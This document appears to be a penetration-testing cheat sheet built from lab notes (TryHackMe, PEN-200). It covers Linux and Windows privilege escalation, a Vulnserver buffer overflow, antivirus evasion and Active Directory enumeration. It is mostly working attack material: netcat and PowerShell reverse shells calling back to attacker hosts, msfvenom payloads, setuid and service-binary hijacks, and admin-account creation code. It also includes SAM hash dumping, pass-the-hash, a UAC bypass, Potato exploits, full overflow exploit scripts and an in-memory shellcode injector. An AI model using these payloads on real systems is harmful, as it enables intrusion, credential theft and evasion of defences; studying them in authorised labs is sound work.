rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Your-IP> 4444 >/tmp/f
- You can also try with
- Open a listener with
nc -nvlp 4444
PATH Environment Variable
- See Task 9 - Linux PrivEsc | TryHackMe
- The crontab
PATH
environment variable is by default set to/usr/bin:/bin
and can be overwritten in the crontab file - It might be possible to create a program or script with the same name as the cron job if the program or script for a cron job does not utilize an absolute path and one of the PATH directories is editable by our user.
Wildcards
- See Task 10 - Linux PrivEsc | TryHackMe
- Generate a reverse shell with
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf -o shell.elf
- make it executable
chmod +x shell.elf
- make it executable
- run other commands as part of a checkpoint feature
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf
setuid + GTFOBins
- Check for setuid binaries on the machine
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
- Use GTFOBins to elevate your privileges
Known Exploits
- Search for all the SUID/SGID executables on the Linux Machine
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
- Use Exploit-DB, Google and GitHub to find known exploits
Shared Object Injection
- See Task 12 - Linux PrivEsc | TryHackMe
strace <program to run> 2>&1 | grep -iE "open|access|no such file"
run strace and search the output for open/access calls and for "no such file" errors-
#include <stdio.h> #include <stdlib.h> static void inject() __attribute__((constructor)); void inject() { setuid(0); system("/bin/bash -p"); }
Environment Variables
Abusing Shell Features (#1)
- See Task 14 - Linux PrivEsc | TryHackMe
-
"In Bash versions <4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path."
-
function /usr/sbin/service { /bin/bash -p; } export -f /usr/sbin/service
-
Abusing Shell Features (#2)
- See Task 15 - Linux PrivEsc | TryHackMe. Note: This doesn't work on Bash versions 4.4 and above
-
"When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements."
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' <program>
/tmp/rootbash -p
- View the content of history with
cat ~/.*history | less
and search for secrets - Search for config files as they often contain passwords in plaintext or other reversible formats (example:
*.ovpn
) - Search for backups and hidden files
ls -la /
look for hidden files & directories in the system root- Other common locations to check
ls -la /home/user
ls -la /tmp
ls -la /var/backups
- See Task 18 - Linux PrivEsc | TryHackMe
-
"Files created via NFS inherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user."
- Show the NFS server’s export list:
showmount -e <target>
- The same with nmap:
nmap –sV –script=nfs-showmount <target>
- The same with nmap:
- Mount an NFS share:
mount -o rw,vers=2 <target>:<share> <local_directory>
- See Task 19 - Linux PrivEsc | TryHackMe
Root Squashing
- Root Squashing is how NFS prevents an obvious privilege escalation
no_root_squash
turns root squashing off- Check: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
- Enumerate the kernel version
uname -a
- Find an exploit, example:
searchsploit linux kernel 2.6.32 priv esc
- Some resources
- Find possible exploits with Linux Exploit Suggester 2
- Dirty COW | CVE-2016-5195
- CVE-2017-1000112
- Also known as "Abusing Setuid Binaries"
find /home/username/Desktop -exec "/usr/bin/bash" -p \;
- See more here: find | GTFOBins
/usr/sbin/getcap -r / 2>/dev/null
enumerate capabilities- Search for
cap_setuid+ep
, meaning that setuid capabilities are enabled, effective and permitted
- Search for
- Search what you need in GTFOBins
- Example with Perl:
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
- Example with Perl:
See Information gathering | Windows. Always obtain:
- Username and hostname
- Group memberships of the current user
- Existing users and groups
- Operating system, version and architecture
- Network information
- Installed applications
- Running processes
Tools
- AccessChk
- Sysinternals
- MinGW-w64
- Windows Reverse Shells Cheatsheet
- Windows persistence
- Scripts
- Windows Privilege Escalation Awesome Scripts
- Seatbelt
- Seatbelt.exe
.\Seatbelt.exe all
.\Seatbelt.exe -group=all -full
- Seatbelt.exe
- PowerUp (archived)
- PowerUpSQL
- Windows-privesc-check
windows-privesc-check2.exe -h
windows-privesc-check2.exe --dump -G
- creddump7
- Paper: Abusing Token Privileges For EoP
- List your privileges:
whoami /priv
SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeDebugPrivilege
- Check your user (
whoami
) and groups (net user <username>
) - Run winPEAS with fast, searchfast, and cmd options
- Run Seatbelt & other scripts
- Check also: PayloadsAllTheThings/Methodology and Resources/Windows - Privilege Escalation.md
- Have a quick look around for files in your user’s desktop and other common locations
- Read through interesting files
- Try things that don’t have many steps first (e.g. registry exploits, services, etc.)
- Look at admin processes, enumerate their versions and search for exploits
- Check for internal ports that you might be able to forward to your attacking machine
#include <stdlib.h>
int main () {
int i;
i = system ("net user /add [username] [password]");
i = system ("net localgroup administrators [username] /add");
return 0;
}
- 32-bit Windows executable:
i686-w64-mingw32-gcc adduser.c -o adduser.exe
- 64-bit Windows executable:
x86_64-w64-mingw32-gcc -o adduser.exe adduser.c
- Note: 32-bit and 64-bit Windows: Frequently asked questions
- Generate the reverse shell on your attacker machine:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe
- Transfer it to the Windows machine with SMB:
sudo python3 /opt/impacket/examples/smbserver.py kali .
and thencopy \\<IP>\kali\reverse.exe C:\PrivEsc\reverse.exe
Create a PowerShell remoting session via WinRM
$password = ConvertTo-SecureString <password> -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<password>", $password)
Enter-PSSession -ComputerName <computer_name> -Credential $cred
Check also:
- Windows Reverse Shells Cheatsheet
- Evil-WinRM
evil-winrm -i <IP> -u <username> -p <password>
- powershell_reverse_shell.ps1
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Other shells with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=8444 EXITFUNC=thread -f exe -o shell.exe
msfvenom -p windows/×64/shell_reverse_tcp LHOST=<IP> LPORT=445 -f exe -e 64/xor -o shell.exe
msfvenom -f psh-cmd -p windows/shell_reverse_tc LHOST=tun0 LPORT=8443 -o rev.ps1
msfvenom -f ps1 -p windows/shell_reverse_tcp LHOST=tun0 LPORT=8443 -o rev.ps1
msfvenom -p windows/shell_reverse_tcp --list formats
msfvenom -p windows/shell_reverse_tcp --list-options
- Save the output of the
systeminfo
command:systeminfo > systeminfo.txt
- Try also the command:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
- Try also the command:
- Use it with Windows Exploit Suggester to find potential exploits:
python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less
- See also: Watson
- See windows-kernel-exploits
- Enumerate the drivers that are installed on the system:
driverquery /v
- Search in the Exploit Database
Note: to find running services, use this command from the powershell: Get-Service
or Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
Service Commands
sc.exe qc <name> Query the configuration of a service
sc.exe query <name> Query the current status of a service
sc.exe config <name> <option>= <value> Modify a configuration option of a service
net start/stop <name> Start/Stop a service
Insecure Service Permissions
- Use AccessChk to check the "user" account's permissions on the "daclsvc" service:
C:\PrivEsc\accesschk.exe /accepteula -uwcqv <user> <service>
- If
SERVICE_CHANGE_CONFIG
is present, it's possible to change the service configuration - Query the service. If it runs with
SYSTEM
privileges, it's possible a privilege escalationsc qc <service>
- Example:
SERVICE_START_NAME: LocalSystem
- Modify the service config and set the
BINARY_PATH_NAME
(binpath) to the reverse shell executablesc config <service> binpath= "\"C:\PrivEsc\reverse.exe\""
- Set a listener and start the service
net start <service>
Unquoted Service Path
- Check: "Microsoft Windows Unquoted Service Path Vulnerability"
- Query a service. If it runs with
SYSTEM
privileges (checkSERVICE_START_NAME
) and theBINARY_PATH_NAME
value is unquoted and contains spaces, it's possible a privilege escalationsc qc <service>
- Example:
BINARY_PATH_NAME: C:\Program Files\Unquoted Path Service\Common Results\unquotedpathservice.exe
- You can also use the Powershell command
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
- Use AccessChk to check write permissions in this directory
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
- You can review the permissions with
icacls "C:\"
andicacls "C:\Program Files\Enterprise Apps"
- Check if you can run and stop the service with
Start-Service GammaService
andStop-Service
- You can review the permissions with
- Copy the reverse shell
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
- Start a listener on the attacker machine and run the service
Weak Registry Permissions
- Query a service. Check if it runs with
SYSTEM
privileges (checkSERVICE_START_NAME
)sc qc <service>
- Use AccessChk to check the write permissions of the registry entry for the service
- note:
NT AUTHORITY\INTERACTIVE
group means all logged-on users C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\<service>
- note:
- Overwrite the ImagePath registry key to point to the reverse shell executable:
reg add HKLM\SYSTEM\CurrentControlSet\services\<service> /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
- Start a listener on the attacker machine and run the service
DLL Hijacking
- See: DLL Hijacking
Example:
- Even if we are logged in as an administrative user, we must move to a high integrity level in order to change the admin user's password.
- To do it, run the following commands
<# spawn a cmd.exe process with high integrity #> powershell.exe Start-Process cmd.exe -Verb runAs <# successfully changing the password of the admin user after spawning cmd.exe with high integrity #> whoami /groups net user admin Ev!lpass
UAC Bypass with fodhelper.exe
, a Microsoft support application responsible for managing language changes in the operating system. Runs as high integrity on Windows 10 1709
- "First entry: Welcome and fileless UAC bypass"
- "UAC Bypass – Fodhelper"
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
Also called "Service Binary Hijacking". Exploit insecure file permissions on services that run as nt authority\system
- List running services on Windows using PowerShell
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
- Enumerate the permissions on the target service
icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
- For this scenario, any user (BUILTIN\Users) on the system has full read and write access to it
- See also "Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation"
- Substitute
ServiioService.exe
with the following#include <stdlib.h> int main () { int i; i = system ("net user [username] [password] /add"); i = system ("net localgroup administrators [username] /add"); return 0; }
i686-w64-gcc adduser.c -o adduser.exe
orx86_64-w64-mingw32-gcc adduser.c -o adduser.exe
to Cross-Compile the C Code to a 64-bit applicationmove "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
dir "C:\Program Files\Serviio\bin\"
- Restart the service, here's two options
net stop Serviio
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'Serviio'}
Obtain Startup Type for Serviio service- Check
Startmode
of the service withwmic service where caption="Serviio" get name, caption, state, startmode
- If it's
Auto
, it means that it will restart after a reboot. Reboot withshutdown /r /t 0
.
- Check if it worked with
net localgroup Administrators
PowerUp.ps1
- Check PowerUp.ps1 and make it available with
python3 -m http.server 80
- Download it from the victim machine
iwr -uri http://<IP>/PowerUp.ps1 -Outfile PowerUp.ps1
- Run the commands
powershell -ep bypass
and. .\PowerUp.ps1
- Then run
Get-ModifiableServiceFile
to display services the current user can modify - Run
Install-ServiceBinary -Name 'mysql'
. If it throws an error even if you already know that the current user has full access permissions on the service binary, proceed with manual exploitation
AutoRuns
- Query the registry for AutoRun executables:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Use AccessChk to check write permissions of the executables
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\<program>.exe"
- Overwrite the reverse shell executables in the
<program>
path:copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
- Start a listener on the attacker machine. A new session on the victim machine will trigger a reverse shell running with admin privileges
AlwaysInstallElevated
- Query the registry for AlwaysInstallElevated keys:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- Note if both keys are set to 1 (
0x1
)
- Note if both keys are set to 1 (
- Generate a reverse shell installer
.msi
withmsfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o reverse.msi
- Transfer the installer
.msi
to the Windows machine - Start a listener on the attacker machine and then run the installer to trigger a reverse shell running with SYSTEM privileges:
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
Registry
- Search for keys and values that contain the word "password"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
- If you have found an admin and its password, use winexe command from the attacker machine to spawn a command prompt running with the admin privileges
winexe -U 'admin%password' //<IP> cmd.exe
Saved Credentials
- Check for any saved credentials
cmdkey /list
- Start a listener on the attacker machine and run the reverse shell executable using
runas
with the admin user's saved credentials:runas /savecred /user:admin C:\PrivEsc\reverse.exe
Search for Configuration Files
- Run the commands:
dir /s *pass* == *.config
andfindstr /si password *.xml *.ini *.txt
- Use winPEAS to search for common files which may contain credentials:
.\winPEASany.exe quiet cmd searchfast filesinfo
- also run
.\winPEASx64.exe windowscreds filesinfo fileanalysis searchpf log=winpeas_out.txt
- also run
Security Account Manager (SAM)
- The
SAM
andSYSTEM
files can be used to extract user password hashes. Check also backups of these filescopy C:\Windows\Repair\SAM \\<IP>\kali\
copy C:\Windows\Repair\SYSTEM \\<IP>\kali\
- Dump the hashes with "creddump7":
python3 creddump7/pwdump.py SYSTEM SAM
- Crack the hashes with
hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt
Passing The Hash
- Use the hashes to authenticate:
pth-winexe -U 'admin%hash' //<IP Victim> cmd.exe
- List all scheduled tasks your user can see:
schtasks /query /fo LIST /v
- In PowerShell:
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
- Search in Task Manager for any scheduled task
- See if you find any
.ps1
script.- If the script found run as
SYSTEM
, check the write permissions of it withC:\PrivEsc\accesschk.exe /accepteula -quvw user C:\<script>.ps1
- Add to it a line to run the reverse shell
echo C:\PrivEsc\reverse.exe >> C:\<script>.ps1
- If the script found run as
- For the
.exe
, review the permissions withicals C:\Users\Documents\service.exe
- If you have full access permissions, substitute the
.exe
as in the section Insecure File Permissions
- If you have full access permissions, substitute the
- See if you find any
- Open an app. Look at the privilege level it runs with
tasklist /V | findstr mspaint.exe
- If the app runs with admin privileges and gives the possibility to open a file dialog box, click in the navigation input and paste:
file://c:/windows/system32/cmd.exe
- Note if
BUILTIN\Users
group can write files to the StartUp directory:C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
- Using cscript, run the following script to create a new shortcut of the reverse shell executable in the StartUp directory:
-
Set oWS = WScript.CreateObject("WScript.Shell") sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk" Set oLink = oWS.CreateShortcut(sLinkFile) oLink.TargetPath = "C:\PrivEsc\reverse.exe" oLink.Save
-
- Manually enumerate all running programs:
tasklist /v
- With seatbelt:
.\seatbelt.exe NonstandardProcesses
- With winPEAS:
.\winPEASany.exe quiet procesinfo
- With seatbelt:
- Search for the applications' versions
- Try running the executable with
/?
or-h,
as well as checking config or text files in theProgram Files
directory
- Try running the executable with
- Use Exploit-DB to search for a corresponding exploit
Note: This attack works on Windows 7, 8, early versions of Windows 10, and their server counterparts.
- See Hot Potato, get the exploit here
- Start a listener on the attacker machine
- Run the exploit:
.\potato.exe -ip 192.168.1.33 -cmd "C:\PrivEsc\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
- Wait for a Windows Defender update (or trigger one manually)
- See Rogue Potato
- Set up a socat redirector on the attacker machine, forwarding its port 135 to port 9999 on Windows
sudo socat tcp-listen:135,reuseaddr,fork tcp:<Windows IP>:9999
- Execute the PoC:
.\RoguePotato.exe -r YOUR_IP -e "command" -l 9999
- Check Juicy Potato, it's an improved version
More Potatoes
- Usage 1
- Copy
PSExec64.exe
and thePrintSpoofer.exe
exploit executable over the Windows machine - Using an administrator command prompt, use PSExec64.exe to trigger a reverse shell running as the Local Service service account:
C:\PrivEsc\PSExec64.exe /accepteula -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
- Run the PrintSpoofer exploit to trigger a reverse shell running with SYSTEM privileges:
C:\PrivEsc\PrintSpoofer.exe –i -c "C:\PrivEsc\reverse.exe"
- Copy
- Usage 2
- Copy the
PrintSpoofer.exe
exploit executable over the Windows machine .\PrintSpoofer64.exe -i -c powershell.exe
- Copy the
- Access Tokens: When a user first logs in, this object is created and linked to their active session. A copy of the user's principal access token is added to the new process when they launch it.
- Impersonation Access Token: When a process or thread momentarily needs to run with another user's security context, this object is created.
- Token Duplication: Windows permits processes and threads to use multiple access tokens. This allows for the duplication of an impersonation access token into a main access token. If we have the ability to inject into a process, we can leverage this feature to copy the process's access token and launch a new process with the same rights.
- Documentation: Meterpreter getsystem | Metasploit Documentation
Tools
- Immunity Debugger + mona
- Vulnserver
- Note: usually,
<port vulnserver>
is9999
- Note: usually,
- Kali
- See also Buffer Overflows Made Easy | The Cyber Mentor
- mingw-w64, a cross-compiler for programs written to be compiled in Windows. With it you can compile them in an OS like Linux
- Example of usage:
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
- Example of usage:
- See also: Buffer Overflow Prep
Issues
- "Problems attach Immunity to Vulnserver on Windows 10": Don't start vulnserver, start Immunity as Admin, File > Open > vulnserver.exe, push "play".
Steps to conduct a Buffer Overflow
- Spiking
- Fuzzing
- Finding the Offset
- Overwriting the EIP
- Finding bad characters
- Finding the right module
- Generating Shellcode
generic_send_tcp <IP Vulnserver> <port vulnserver> script.spk 0 0
Example: trun.spk
s_readline();
s_string("TRUN ");
s_string_variable("0");
#!/usr/bin/python3
import sys, socket
from time import sleep
buffer = "A" * 100
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('<IP Vulnserver>', <port vulnserver>))
s.send(('TRUN /.:/' + buffer).encode())
s.close()
sleep(1)
buffer += "A" * 100
except:
print ("Fuzzing crashed at %s bytes" % str(len(buffer)))
sys.exit()
- Get the result from:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <bytes_where_server_crashed>
- Modify the previous script in
#!/usr/bin/python3 import sys, socket from time import sleep offset = "RESULT_FROM_STEP_1" while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('<IP Vulnserver>', <port vulnserver>)) s.send(('TRUN /.:/' + offset).encode()) s.close() except: print ("Error connecting to the server") sys.exit()
- After running the script, read the value from the EIP
- With that value, run this script:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q EIP_VALUE_STEP_2
From the previous result, we should get the position 2003
for the start of the EIP. We can test this by sending A * 2003
plus B * 4
and see if EIP = 42424242
(since 42424242
= BBBB
).
#!/usr/bin/python3
import sys, socket
from time import sleep
shellcode = "A" * 2003 + "B" * 4
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('<IP Vulnserver>', <port vulnserver>))
s.send(('TRUN /.:/' + shellcode).encode())
s.close()
except:
print ("Error connecting to the server")
sys.exit()
You can generate a string of bad chars with the following python script
for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')
print()
The following python script is used to find bad chars
#!/usr/bin/python3
import sys, socket
from time import sleep
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
shellcode = "A" * 2003 + "B" * 4 + badchars
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('<IP Vulnserver>', <port vulnserver>))
s.send(('TRUN /.:/' + shellcode))
s.close()
except:
print "Error connecting to the server"
sys.exit()
- After starting the script, once vulnserver breaks down, go in Immunity
Debugger
>Registers
> Right-click onESP
>Follow in Dump
> SeeHex dump
. - Check if the Hex dump makes sence, e.g. in the Hex dump there is no number value missing.
- Example: you may get a result like
... 01 02 03 B0 B0 06 07 08 ...
. As you can see,04
and05
are missing, so you've found a bad character.
- Example: you may get a result like
- Write down every character missing
Another solution to the step 3.
, with mona and Immunity Debugger
- Set the working directory with
!mona config -set workingfolder c:\mona
- Generate bad characters with
!mona bytearray -cpb "\x00"
from Immunity Debugger- Notice the new files in
c:\mona
- Notice the new files in
- Run the python script of this section
- Execute the command
!mona compare -f c:\mona\bytearray.bin -a <address of ESP>
- Note: this may cause false positive
Note: JMP ESP
will be used as the pointer to jump to the shellcode. With nasm_shell.rb
we can get the hex equivalent to these commands.
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000 FFE4 jmp esp
On Immunity, using mona, type
!mona modules
to get the module to use, one with no memory protection for vulneserver. In this case,essfunc.dll
.!mona jmp -r ESP -m "essfunc.dll"
to find the jump address- See the entries in
[+] Results:
- Copy the result from
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"
- Always note the payload size
-b
is for the badchars identified
- See the following script
#!/usr/bin/python3 import sys, socket from time import sleep overflow = () # HERE INSERT THE RESULT FROM THE STEP 1, THE VALUE IN `unsigned char buf[]` # Before every line insert `b`, this will say to bytencode the string shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + overflow while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('<IP Vulnserver>', <port vulnserver>)) s.send((b'TRUN /.:/' + shellcode)) s.close() except: print ("Error connecting to the server") sys.exit()
- "\xaf\x11\x50\x62" is the jump address found for this example
625011af
in reverse shellcode
also contains"\x90" * 32
. Those are NOPs, some padding to make sure that our code gets executed.
- "\xaf\x11\x50\x62" is the jump address found for this example
- Use the command
nc -nvlp 4444
- Run the script, notice the shell in netcat
- Discover the AV in the machine of the victim
- Create a VM that resembles the victim's machine
- Make sure to disable sample submission
Windows Security
>Virus & threat protection
>Manage Settings
>Automatic Sample Submission
- As last resort, check the malware created with
-
Write this In-memory payload injection PowerShell
.ps1
script, from PEN-200<# Importing Windows APIs in PowerShell #> $code = ' [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr dest, uint src, uint count);'; <# Memory allocation and payload writing using Windows APIs in PowerShell #> $var2 = Add-Type -memberDefinition $code -Name "iWin32" -namespace Win32Functions -passthru; [Byte[]]; [Byte[]] $var1 = <SHELLCODE-HERE>; $size = 0x1000; if ($var1.Length -gt 0x1000) {$size = $var1.Length}; $x = $var2::VirtualAlloc(0,$size,0x3000,0x40); for ($i=0;$i -le ($var1.Length-1);$i++) {$var2::memset([IntPtr]($x.ToInt32()+$i), $var1[$i], 1)}; <# Calling the payload using CreateThread #> $var2::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
-
Generate a PowerShell compatible payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f powershell
-
Insert the result in
[Byte[]] $var1
in the PowerShell Script -
Change the ExecutionPolicy for current user
PS C:\> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser PS C:\> Get-ExecutionPolicy -Scope CurrentUser
-
Set up a handler to interact with the meterpreter shell
msf exploit(multi/handler) > show options <# Set the correct values #> msf exploit(multi/handler) > exploit
-
Run the PowerShell script
- You can also decide to convert the script in base64 with ps_encoder.py and run it with
powershell.exe -e <BASE64>
- You can also decide to convert the script in base64 with ps_encoder.py and run it with
-
Get the meterpreter shell on the attacking machine
Note
Example of usage
- Select Auto mode with
A
- Selecting a target PE in shellter and performing a backup, in this case the WinRAR installer:
/home/kali/Desktop/winrar-x32-621.exe
- Enable stealth mode with
Y
- Select a listed payload with
L
- Select
meterpreter_reverse_tcp
with1
- Set
LHOST
andLPORT
- Create a listener in Kali with Metasploit
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <IP>;set LPORT <PORT>;run;"
- Get the meterpreter shell on the attacking machine
- See also Cheat Sheet - Active Directory, Active Directory Exploitation Cheat Sheet and Pentesting_Active_directory mindmap
- WADComs, an interactive cheat sheet
- Check for
Domain Admins
andService Accounts
groups - Add an account to a group
net group "<group>" <user> /add /domain
- Verify the success of the command with
Get-NetGroup "<group>" | select member
- Delete the
<user>
with/del
instead of/add
- Use
gpp-decrypt
to decrypt a given GPP encrypted string - Note
ActiveDirectoryRights
andSecurityIdentifier
for each object enumerated during Object Permissions Enumeration - The highest permission is
GenericAll
. Note alsoGenericWrite
,WriteOwner
,WriteDACL
,AllExtendedRights
,ForceChangePassword
,Self (Self-Membership)
Server | Algorithm available |
---|---|
Windows 2003 | NTLM |
Windows Server 2008 or later | NTLM and SHA-1 |
- Old Windows OS (like Windows 7) - OS that have it manually set |
WDigest |
net user /domain display users in the domain
net user <username> /domain net-user against a specific user
net group /domain enumerate groups in the domain
net group "<group-name>" /domain display members in specific group
LDAP://host[:port][/DistinguishedName] LDAP path format. CN = Common Name; DC = Domain Component;
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() domain class from System.DirectoryServices.ActiveDirectory namespace
powershell -ep bypass bypass the execution policy
([adsi]'').distinguishedName obtain the DN for the domain
Import-Module .\PowerView.ps1 Import PowerView; https://powersploit.readthedocs.io/en/latest/Recon/
Get-NetDomain Obtain domain information
Get-NetUser | select cn,pwdlastset,lastlogon Obtain users in the domain; username only
Get-NetGroup | select cn Obtain groups in the domain
Get-NetGroup "GROUP-NAME" | select member Enumerate a specific group
Get-NetComputer Enumerate the computer objects in the domain
Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion Display OS and hostname
Find-LocalAdminAccess Scan domain to find local administrative privileges for our user
Get-NetSession -ComputerName INPUT -Verbose Check logged on users with Get-NetSession
Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl Display permissions on the DefaultSecurity registry hive
Object Permissions Enumeration
------------------------------
Get-ObjectAcl -Identity <username> Enumerate ACEs
Convert-SidToName <SID> Convert ObjectISD and SecurityIdentifier into names
"<SID>", "<SID>", "<SID>", "<SID>", ... | Convert-SidToName Convert <SID>s into names
Get-ObjectAcl -Identity "<group>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights Enumerat ACLs for <group>, only display values equal to GenericAll
Domain Shares Enumeration
-------------------------
Find-DomainShare Find Domain Shares
- See also PowerView-3.0-tricks.ps1
Download: PsLoggedOn - Sysinternals | Microsoft Learn
.\PsLoggedon.exe \\COMPUTERNAME See user logons at COMPUTERNAME
setspn -L <username> List the SPNs connected to a certain user account
Get-NetUser -SPN | select samaccountname,serviceprincipalname List the SPNs accounts in the domain
Get-ObjectAcl -Identity <username> Enumerate ACEs
Convert-SidToName <SID> Convert ObjectISD and SecurityIdentifier into names
